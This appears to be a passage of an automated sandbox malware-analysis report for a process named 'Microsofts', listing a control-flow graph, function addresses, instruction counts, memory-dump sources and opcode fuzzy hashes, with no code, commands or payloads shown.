                                                                                                                                      control_flow_graph 1647 bbb500-bbb509 1648 bbb50b-bbb510 1647->1648 1649 bbb512-bbb515 1647->1649 1650 bbb54a-bbb54d 1648->1650 1651 bbb51e-bbb521 1649->1651 1652 bbb517-bbb51c 1649->1652 1653 bbb52a-bbb52d 1651->1653 1654 bbb523-bbb528 1651->1654 1652->1650 1655 bbb52f-bbb534 1653->1655 1656 bbb536-bbb539 1653->1656 1654->1650 1655->1650 1657 bbb53b-bbb540 1656->1657 1658 bbb542-bbb545 1656->1658 1657->1650 1659 bbb54e-bbb5be 1658->1659 1660 bbb547 1658->1660 1667 bbb5c3-bbb5d2 call bbb4a8 1659->1667 1660->1650 1670 bbb61b-bbb61e 1667->1670 1671 bbb5d4-bbb5ef 1667->1671 1672 bbb620-bbb626 1670->1672 1673 bbb634-bbb640 1670->1673 1671->1670 1684 bbb5f1-bbb5f5 1671->1684 1672->1667 1674 bbb628 1672->1674 1678 bbb642-bbb663 1673->1678 1679 bbb667-bbb668 1673->1679 1676 bbb62a-bbb631 1674->1676 1681 bbb66f-bbb675 1678->1681 1682 bbb665 1678->1682 1679->1681 1683 bbb66a-bbb66d 1679->1683 1686 bbb689-bbb6bd call bbab68 1681->1686 1687 bbb677-bbb67a 1681->1687 1682->1679 1683->1681 1685 bbb6c0-bbb718 1683->1685 1688 bbb5fe-bbb607 1684->1688 1689 bbb5f7-bbb5fc 1684->1689 1697 bbb71f-bbb79f 1685->1697 1687->1686 1690 bbb67c-bbb67e 1687->1690 1688->1670 1691 bbb609-bbb612 1688->1691 1689->1676 1690->1686 1693 bbb680-bbb683 1690->1693 1691->1670 1694 bbb614-bbb619 1691->1694 1693->1686 1693->1697 1694->1676 1715 bbb7bf-bbb815 1697->1715 1716 bbb7a1-bbb7a5 1697->1716 1722 bbb820-bbb829 1715->1722 1723 bbb817-bbb81e 1715->1723 1754 bbb7a8 call bbb869 1716->1754 1755 bbb7a8 call bbb4ef 1716->1755 1756 bbb7a8 call bbb89d 1716->1756 1757 bbb7a8 call bbb500 1716->1757 1717 bbb7ab-bbb7bc 1725 bbb82b-bbb832 1722->1725 1726 bbb834 1722->1726 1724 bbb83b-bbb844 1723->1724 1727 bbb84a-bbb867 1724->1727 1728 bbb8d8-bbb8dc 1724->1728 1725->1724 1726->1724 1730 bbb8e5-bbb901 1727->1730 1758 bbb8df call bbb9e9 1728->1758 1759 bbb8df call bbb9f8 1728->1759 1733 bbb908-bbb962 call bbab78 1730->1733 1734 bbb903-bbb906 1730->1734 1735 bbb96a-bbb973 1733->1735 1734->1733 1734->1735 1736 bbb97a-bbb9b0 1735->1736 1737 bbb975-bbb978 1735->1737 1739 bbb9df-bbb9e5 1736->1739 1749 bbb9b2-bbb9d7 call bbab88 1736->1749 1737->1736 1737->1739 1749->1739 1754->1717 1755->1717 1756->1717 1757->1717 1758->1730 1759->1730
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b163c29afcebbc68025657466d3fe0b9f40746fb191dfbabce00e611edb7c4ad
                                                                                                                                      • Instruction ID: 480ae2815662bca093eb1a25f55d5a724e428bb141858e1ea9275ff477e844e6
                                                                                                                                      • Opcode Fuzzy Hash: b163c29afcebbc68025657466d3fe0b9f40746fb191dfbabce00e611edb7c4ad
                                                                                                                                      • Instruction Fuzzy Hash: 9FD19131B042048FDB15DB68C890ABEBBF2EF89320F2545AAE506DB3A1DBB5DD41C751
                                                                                                                                      Function 00BBBF80 Relevance: .2, Instructions: 223COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0d10b6d03735a8dd624ba83c1339ac85c3414ff888e5c146a343758df6754baf
                                                                                                                                      • Instruction ID: dfac4f995605ab842fb0df9ba6749ca271cd8d505d40d3480cff005f2848d780
                                                                                                                                      • Opcode Fuzzy Hash: 0d10b6d03735a8dd624ba83c1339ac85c3414ff888e5c146a343758df6754baf
                                                                                                                                      • Instruction Fuzzy Hash: 9961D272B00205DFCB14EABCD884ABABFF5EBC9324B14856AE569E7750D771DC0187A0
                                                                                                                                      Function 00BB0B20 Relevance: .2, Instructions: 205COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b4c3fcbd644b943aeef11a79b386897f5b35f3f5be7dfd784bfba197bdcec834
                                                                                                                                      • Instruction ID: fa8647b3dbe30845493411acf47a436c8dcdaca650b1382586a83f509d975f73
                                                                                                                                      • Opcode Fuzzy Hash: b4c3fcbd644b943aeef11a79b386897f5b35f3f5be7dfd784bfba197bdcec834
                                                                                                                                      • Instruction Fuzzy Hash: 47A19078D0020ACFCB05EFB8E9A5A9DBBB1FB49305B205529E505A7359EB706D45CF80
                                                                                                                                      Function 00BB0B30 Relevance: .2, Instructions: 200COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: af7b3f7304dda00782b42c398120c09260ac2f43b6d6f19d2e1ea421f05e4776
                                                                                                                                      • Instruction ID: d6dd2b2820cf5bffc3d6ecce7daa5108003cad35a388ff6d48b121a6c23699f0
                                                                                                                                      • Opcode Fuzzy Hash: af7b3f7304dda00782b42c398120c09260ac2f43b6d6f19d2e1ea421f05e4776
                                                                                                                                      • Instruction Fuzzy Hash: 15A18D78E0020ACFCB05EFB8E9A599DBBB1FB49305B205529E505A7369EB706D45CF80
                                                                                                                                      Function 00BB3F78 Relevance: .1, Instructions: 126COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: eb522ff6c5919f61d9f6a5425b6d17fd02f1e539e11611aa7a34ccb64c64c12c
                                                                                                                                      • Instruction ID: f196c4b8ad778bbc5ea4179c8b59af4211a3893fae0a49dffe823aa8942cb6e5
                                                                                                                                      • Opcode Fuzzy Hash: eb522ff6c5919f61d9f6a5425b6d17fd02f1e539e11611aa7a34ccb64c64c12c
                                                                                                                                      • Instruction Fuzzy Hash: 0051C274E00208DFDB48DFA9D494AEDBBF2BF89310F209469E815AB365DB749942CF10
                                                                                                                                      Function 00BB2C78 Relevance: .1, Instructions: 118COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 4f0b7fbf6abbacf8db7c1d6642203412e97117cb56b2dafae8b126b72bce662b
                                                                                                                                      • Instruction ID: 2c43c1dd37ebc8b978765dd1ceb030619747782daea6e231bfcf2f60f11ec84d
                                                                                                                                      • Opcode Fuzzy Hash: 4f0b7fbf6abbacf8db7c1d6642203412e97117cb56b2dafae8b126b72bce662b
                                                                                                                                      • Instruction Fuzzy Hash: 7831E535B042158BEF2D5B6998A42FE6AE6FBD5300F1841BED902C3395EFF48C458761
                                                                                                                                      Function 00BB3509 Relevance: .1, Instructions: 110COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3e29001c436af2458e4dbb660b26bd55795271dcb217bd39e060a1765324f052
                                                                                                                                      • Instruction ID: 86d3050d7578877f27fe0fccf1ffb0a9dec47e9e60c06aa3a55255ce737329e5
                                                                                                                                      • Opcode Fuzzy Hash: 3e29001c436af2458e4dbb660b26bd55795271dcb217bd39e060a1765324f052
                                                                                                                                      • Instruction Fuzzy Hash: E441DD78E08248CFCB25CFA4D8944FCBBF2EF6A710F20509AC509AB216D67699058F51
                                                                                                                                      Function 00BB3168 Relevance: .1, Instructions: 109COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 663150950e02f3ab65a1bc18acdc5d625eaac253d3f584b6ab714f4c3fe2c415
                                                                                                                                      • Instruction ID: 7a332e7e708252158ceb3828dc181a1ac89e5bd2a4e05579be5a1a5420f3f7d9
                                                                                                                                      • Opcode Fuzzy Hash: 663150950e02f3ab65a1bc18acdc5d625eaac253d3f584b6ab714f4c3fe2c415
                                                                                                                                      • Instruction Fuzzy Hash: 02419E74E012089FCB08DFAAD8949EDBBF2BF89300F249569E805BB364DB749945CF14
                                                                                                                                      Function 00BB9249 Relevance: .1, Instructions: 107COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5469be26593b8455720617fe59300545939d03c970035e1ade492a8fe6f0ef10
                                                                                                                                      • Instruction ID: a9e3221fb47c42bb67500acf17bbeef5752c6f0b61dbf02f3efdbb9e19d78ed2
                                                                                                                                      • Opcode Fuzzy Hash: 5469be26593b8455720617fe59300545939d03c970035e1ade492a8fe6f0ef10
                                                                                                                                      • Instruction Fuzzy Hash: DB31F27002A2468FD3012F31E5AC57A7FA0FBAF313B84AC46E00E82852CB396844CF31
                                                                                                                                      Function 00BBB869 Relevance: .1, Instructions: 101COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b57ac06c1d7f29234f03a6d251ffc91437a881222e05341402a576903c108164
                                                                                                                                      • Instruction ID: 73d06b1cca5bf69d722e072885c475da2b7d9317c770ada4070b86b5fb2457a1
                                                                                                                                      • Opcode Fuzzy Hash: b57ac06c1d7f29234f03a6d251ffc91437a881222e05341402a576903c108164
                                                                                                                                      • Instruction Fuzzy Hash: 64311775B001098FDB15DBA8C490EEDBBF2EF89320F595194E601AB365DBB0EC41CBA0
                                                                                                                                      Function 00BBB89D Relevance: .1, Instructions: 100COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: bdf28a6749c8375b2823b4c22ce96187689f9f8ab13846827393b0c40be25943
                                                                                                                                      • Instruction ID: 17ff1780f9e4f4524d8e8b39467421424fac9e6dfb7f73de6e4b32e7efbf6f15
                                                                                                                                      • Opcode Fuzzy Hash: bdf28a6749c8375b2823b4c22ce96187689f9f8ab13846827393b0c40be25943
                                                                                                                                      • Instruction Fuzzy Hash: 24311775B001098FDB54DBA8D490EEDBBF2EF89320F555194E601AB365DBB1EC41CBA0
                                                                                                                                      Function 00BBBDE8 Relevance: .1, Instructions: 87COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 84173dd412de6cd61c82d319e58ae9c0abe76f42ccf6fde72e29b89c4f4ad3e0
                                                                                                                                      • Instruction ID: e1cf7506114b62625b14c79ef1ff18c099e2e7d72985d24f18b4273d0617e99d
                                                                                                                                      • Opcode Fuzzy Hash: 84173dd412de6cd61c82d319e58ae9c0abe76f42ccf6fde72e29b89c4f4ad3e0
                                                                                                                                      • Instruction Fuzzy Hash: A631BF357042049FDB04DF68C895AAEBBF6FF89300F5080AAE5068B362DB709D46CB91
                                                                                                                                      Function 00BBBCE8 Relevance: .1, Instructions: 83COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6df543796690aa0baf2dd8b641567c521a2750bfbfa0f61fe5385a97461a88c0
                                                                                                                                      • Instruction ID: a1e27c261054a708e7bf03dd461ee8781ddf2cecfc8ca1defb8d613a72749ec0
                                                                                                                                      • Opcode Fuzzy Hash: 6df543796690aa0baf2dd8b641567c521a2750bfbfa0f61fe5385a97461a88c0
                                                                                                                                      • Instruction Fuzzy Hash: 51219F71A001089FDB44EFB8C855ABE7BF6EF88300B5041BAE509D7255EB749E02C7A0
                                                                                                                                      Function 00BB18C8 Relevance: .1, Instructions: 77COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0b350945c415b3be08b10bc6c6f674ebf057daef77e942711ee7736ee5c328e4
                                                                                                                                      • Instruction ID: 80a0f5ddfc69c2726ab77ad27b772a4076c87bb894442b0b4f5fb28bd5434666
                                                                                                                                      • Opcode Fuzzy Hash: 0b350945c415b3be08b10bc6c6f674ebf057daef77e942711ee7736ee5c328e4
                                                                                                                                      • Instruction Fuzzy Hash: DE21C435A001869FCB14DF28D4609FE77B5EBD9350BA0C499E8499B344EB31EE06CB91
                                                                                                                                      Function 00A5D030 Relevance: .1, Instructions: 72COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4630209610.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_a5d000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 4b0cbb480c88132dbfe24268bc63d77110e0b128e083e8aaed79d384a2cd9fd4
                                                                                                                                      • Instruction ID: 1d92210f5e5438e9cd81d8fecbf84b09b8a0ecd16bf7761f03da2407965a5c2b
                                                                                                                                      • Opcode Fuzzy Hash: 4b0cbb480c88132dbfe24268bc63d77110e0b128e083e8aaed79d384a2cd9fd4
                                                                                                                                      • Instruction Fuzzy Hash: A821C271604244EFDB24DF14D9C0B26BBA5FB84319F24C56DDD0A4B296C37AD84BCA62
                                                                                                                                      Function 00A5D005 Relevance: .1, Instructions: 69COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4630209610.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_a5d000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8732cee1f963816c9d23aebefc0ccf385514f57172e2c8e25c43fbc241813b24
                                                                                                                                      • Instruction ID: e6b8ee15663e46cc7f456fd2ba0f729cac42d52f6535f5e4a0611c13f888d53e
                                                                                                                                      • Opcode Fuzzy Hash: 8732cee1f963816c9d23aebefc0ccf385514f57172e2c8e25c43fbc241813b24
                                                                                                                                      • Instruction Fuzzy Hash: F8214B715093C49FCB13CF24D990711BF71AB46214F29C5DAD8898F2A7C33A980ACB62
                                                                                                                                      Function 00BB34DD Relevance: .1, Instructions: 69COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8a60ec3d851d8e26e266133493fdf365c054caf06d66aafb4da8c4f50b742628
                                                                                                                                      • Instruction ID: abd5fbcf62e57fb0b795e69f7ec0e5fcfa981f295ee1ca832c39e194bac986c3
                                                                                                                                      • Opcode Fuzzy Hash: 8a60ec3d851d8e26e266133493fdf365c054caf06d66aafb4da8c4f50b742628
                                                                                                                                      • Instruction Fuzzy Hash: 0C212438E09248CFCB25DFA8D8946ECBBB2EF89300F20906AD809AB255D7349845CF50
                                                                                                                                      Function 00BB0EC8 Relevance: .1, Instructions: 65COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 4c300067063245cf8241a343e5cf889a432e491c2dcd20dc831b98530a18bef5
                                                                                                                                      • Instruction ID: cb9cd3e6c63a4fc67f7368cd585cc2a85da7c5efd94e8bda5ddf23383519e411
                                                                                                                                      • Opcode Fuzzy Hash: 4c300067063245cf8241a343e5cf889a432e491c2dcd20dc831b98530a18bef5
                                                                                                                                      • Instruction Fuzzy Hash: 11216875E102089FDB08EFB9D4507FEBBB2FB89305F2084A994149B395DBB49A45CF41
                                                                                                                                      Function 00BB17B8 Relevance: .1, Instructions: 60COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d1987f0b5d552f14855ac3469b8f813c9a1b5aacd2bd30ea920799d357185dd1
                                                                                                                                      • Instruction ID: 68cf5a9e890ef2c786f8149fe81e3ab6f0237f8fad69699d53c04c7cc618a8a0
                                                                                                                                      • Opcode Fuzzy Hash: d1987f0b5d552f14855ac3469b8f813c9a1b5aacd2bd30ea920799d357185dd1
                                                                                                                                      • Instruction Fuzzy Hash: 0F21E471D0925A8FCB01DFA9D8A45EDBFF0BF0A304F1445AAD405B7261EB344A85CBA1
                                                                                                                                      Function 00BBBB48 Relevance: .1, Instructions: 60COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7bbace223e5c07b6ae12928d06b939f1675eb90e6e5cd402bab07814ad11912a
                                                                                                                                      • Instruction ID: 2d2c2e7725a6637007b52cb840933443563f84110e8bb34ef836e0b3ce40a2d2
                                                                                                                                      • Opcode Fuzzy Hash: 7bbace223e5c07b6ae12928d06b939f1675eb90e6e5cd402bab07814ad11912a
                                                                                                                                      • Instruction Fuzzy Hash: DC115176300104CFD724DB69D994E66B7E6FF99721B2180A9E24ACB364CBB1EC04CB50
                                                                                                                                      Function 00BB4850 Relevance: .1, Instructions: 54COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: c72e36e1c0806f2d42c2b7d1a7446891e2e8a228bc91c9936aa746a1faeb2e85
                                                                                                                                      • Instruction ID: ef11c0820dcdbe7127d5badd5f05f44f2cc77e7006b9c58a50210f1b94f1a445
                                                                                                                                      • Opcode Fuzzy Hash: c72e36e1c0806f2d42c2b7d1a7446891e2e8a228bc91c9936aa746a1faeb2e85
                                                                                                                                      • Instruction Fuzzy Hash: 27019A32B012418FDB14ABB98D586BEB6EBAF85260715457AD906CB365FFB0CC018B90
                                                                                                                                      Function 00BB4860 Relevance: .0, Instructions: 49COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 51559350f35809c4d8ca163164517e694ebc1a92adaed676740479d218e36088
                                                                                                                                      • Instruction ID: 5082ff6301fa4f29e9d33ea6d491ae9892dce1572838c0289f88f36c748bfabe
                                                                                                                                      • Opcode Fuzzy Hash: 51559350f35809c4d8ca163164517e694ebc1a92adaed676740479d218e36088
                                                                                                                                      • Instruction Fuzzy Hash: BA018B32B012558B9714ABBA8C5897EB6EBEE84660311457AD905C7355FFB0CC008A91
                                                                                                                                      Function 00BBA508 Relevance: .0, Instructions: 46COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0a01ac64220fcb35a33cb5e8b7ffa10e9f5b24d1e622340e647e99b96db73af5
                                                                                                                                      • Instruction ID: f9f1cdb35402cb70d00c2fa1b28e0ed3dae693daeec24fe6e3bc8a72251cb6ef
                                                                                                                                      • Opcode Fuzzy Hash: 0a01ac64220fcb35a33cb5e8b7ffa10e9f5b24d1e622340e647e99b96db73af5
                                                                                                                                      • Instruction Fuzzy Hash: BE015E75E002099FDF54DFA9D8486EE7BB5FB88310F40482AE91A97241DB749E10CBA1
                                                                                                                                      Function 00BBBB46 Relevance: .0, Instructions: 45COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 31ebf0c2300fe62d57fcb6cd93acea76e6b11e6b5cf9ef00b1e1b601f0d4d423
                                                                                                                                      • Instruction ID: 1883bc331acf1d7cab6e277d14ccfcd23f33c87e49480b382c50cfd19c397c42
                                                                                                                                      • Opcode Fuzzy Hash: 31ebf0c2300fe62d57fcb6cd93acea76e6b11e6b5cf9ef00b1e1b601f0d4d423
                                                                                                                                      • Instruction Fuzzy Hash: A9011A76700100CFD724DB69DA94FA6B7E6EF99721F2584A9E14A8B364CBF0EC04CB10
                                                                                                                                      Function 00BBA4F9 Relevance: .0, Instructions: 42COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b14d304974012f1c025fed88a7c28763a7eae19ca874d93f3b11be320e0b9ada
                                                                                                                                      • Instruction ID: 0acf101b9ce37fa1badd99fa87c85c167ea727aa8ee01edbe3187864bed31710
                                                                                                                                      • Opcode Fuzzy Hash: b14d304974012f1c025fed88a7c28763a7eae19ca874d93f3b11be320e0b9ada
                                                                                                                                      • Instruction Fuzzy Hash: 4A01B131E0020A9FCB20DFA8D8449EE7BB1FF88320F11452AE959D7651CB308E10CBA2
                                                                                                                                      Function 00BBBEF8 Relevance: .0, Instructions: 42COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
